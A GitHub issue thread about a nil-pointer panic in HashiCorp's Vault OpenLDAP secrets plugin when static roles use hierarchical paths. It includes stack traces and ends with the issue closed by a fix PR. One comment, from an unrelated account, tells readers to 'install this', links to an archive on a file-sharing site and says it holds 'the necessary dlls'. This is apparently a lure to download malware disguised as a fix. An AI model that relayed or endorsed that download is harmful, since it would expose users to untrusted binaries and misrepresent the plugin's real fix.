### ISSUE TITLE
segmentation violation on startup

### ISSUE THREAD

**Issue by dvanherbergen** [hashicorp/vault-plugin-secrets-openldap#114]
When using hierarchical paths in static roles, vault no longer starts up and gets a segmentation violation:

```
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x6bac4a9]
goroutine 1234 [running]:
github.com/hashicorp/vault-plugin-secrets-openldap.(*backend).populateQueue(0xc0052d7000, {0xc9c2af8, 0xc007a7e0f0}, {0xc9c2f90, 0xc005412d00})
/home/runner/go/pkg/mod/github.com/hashicorp/vault-plugin-secrets-openldap@v0.12.1/rotation.go:67 +0x449
github.com/hashicorp/vault-plugin-secrets-openldap.(*backend).initQueue(0xc0052d7000, {0xc9c2af8?, 0xc007a7e0f0}, 0xc008508430)
/home/runner/go/pkg/mod/github.com/hashicorp/vault-plugin-secrets-openldap@v0.12.1/rotation.go:461 +0x10e
created by github.com/hashicorp/vault-plugin-secrets-openldap.(*backend).initialize in goroutine 1211
/home/runner/go/pkg/mod/github.com/hashicorp/vault-plugin-secrets-openldap@v0.12.1/backend.go:92 +0xf7
```

This happens in both version 0.12.1 and 0.13.0:

```
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x6fd496d]
goroutine 1156 [running]:
github.com/hashicorp/vault-plugin-secrets-openldap.(*backend).populateQueue(0xc0030a4600, {0xd037178, 0xc0053d9540}, {0xd037610, 0xc003f71e80})
/home/runner/go/pkg/mod/github.com/hashicorp/vault-plugin-secrets-openldap@v0.13.0/rotation.go:67 +0x42d
github.com/hashicorp/vault-plugin-secrets-openldap.(*backend).initQueue(0xc0030a4600, {0xd037178, 0xc0053d9540}, 0xc00681f7d0)
/home/runner/go/pkg/mod/github.com/hashicorp/vault-plugin-secrets-openldap@v0.13.0/rotation.go:461 +0x107
created by github.com/hashicorp/vault-plugin-secrets-openldap.(*backend).initialize in goroutine 1177
/home/runner/go/pkg/mod/github.com/hashicorp/vault-plugin-secrets-openldap@v0.13.0/backend.go:101 +0xe8
```

**Comment by Kami-prog** [comment]
install this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive

**Comment by dvanherbergen** [comment]
Same problem as described here: https://github.com/hashicorp/vault-plugin-secrets-openldap/pull/112

**Comment by fairclothjm** [comment]
Closed by #115
